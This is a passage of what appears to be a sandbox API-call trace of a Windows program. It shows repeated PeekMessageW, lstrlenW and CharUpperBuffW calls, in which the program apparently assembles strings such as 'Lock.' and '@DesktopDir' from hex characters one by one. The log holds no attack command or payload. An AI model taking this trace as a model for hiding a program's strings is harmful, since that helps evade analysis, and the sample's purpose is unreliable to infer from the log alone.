wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] lstrlenW (lpString="20") returned 2 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] lstrlenW (lpString="31") returned 2 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] lstrlenW (lpString="20") returned 2 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] lstrlenW (lpString="20") returned 2 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] lstrlenW (lpString="31") returned 2 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.995] lstrlenW (lpString="20") returned 2 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] lstrlenW (lpString="20") returned 2 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] lstrlenW (lpString="30") returned 2 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] lstrlenW (lpString="20") returned 2 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.996] lstrlenW (lpString="20") returned 2 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] lstrlenW (lpString="31") returned 2 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] lstrlenW (lpString="20") returned 2 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] lstrlenW (lpString="4C") returned 2 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] lstrlenW (lpString="6F") returned 2 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] lstrlenW (lpString="63") returned 2 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.997] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] lstrlenW (lpString="6B") returned 2 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] lstrlenW (lpString="2E") returned 2 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] lstrlenW (lpString="46") returned 2 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] lstrlenW (lpString="69") returned 2 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] lstrlenW (lpString="78") returned 2 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.998] lstrlenW (lpString="65") returned 2 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] lstrlenW (lpString="64") returned 2 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] lstrlenW (lpString="2E") returned 2 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] lstrlenW (lpString="20") returned 2 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] lstrlenW (lpString="40") returned 2 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] lstrlenW (lpString="44") returned 2 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.999] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] lstrlenW (lpString="65") returned 2 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] lstrlenW (lpString="73") returned 2 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] lstrlenW (lpString="6B") returned 2 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] lstrlenW (lpString="74") returned 2 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] lstrlenW (lpString="6F") returned 2 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] lstrlenW (lpString="70") returned 2 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] lstrlenW (lpString="44") returned 2 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.000] lstrlenW (lpString="69") returned 2 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] lstrlenW (lpString="72") returned 2 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] lstrlenW (lpString="20") returned 2 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] lstrlenW (lpString="2F") returned 2 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.001] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.001] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] lstrlenW (lpString="20") returned 2 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] lstrlenW (lpString="40") returned 2 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] lstrlenW (lpString="44") returned 2 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] lstrlenW (lpString="65") returned 2 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] lstrlenW (lpString="73") returned 2 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] lstrlenW (lpString="6B") returned 2 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] lstrlenW (lpString="74") returned 2 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.047] lstrlenW (lpString="6F") returned 2 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] lstrlenW (lpString="70") returned 2 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] lstrlenW (lpString="44") returned 2 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] lstrlenW (lpString="69") returned 2 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] lstrlenW (lpString="72") returned 2 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] lstrlenW (lpString="20") returned 2 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] lstrlenW (lpString="2F") returned 2 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] lstrlenW (lpString="4C") returned 2 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, 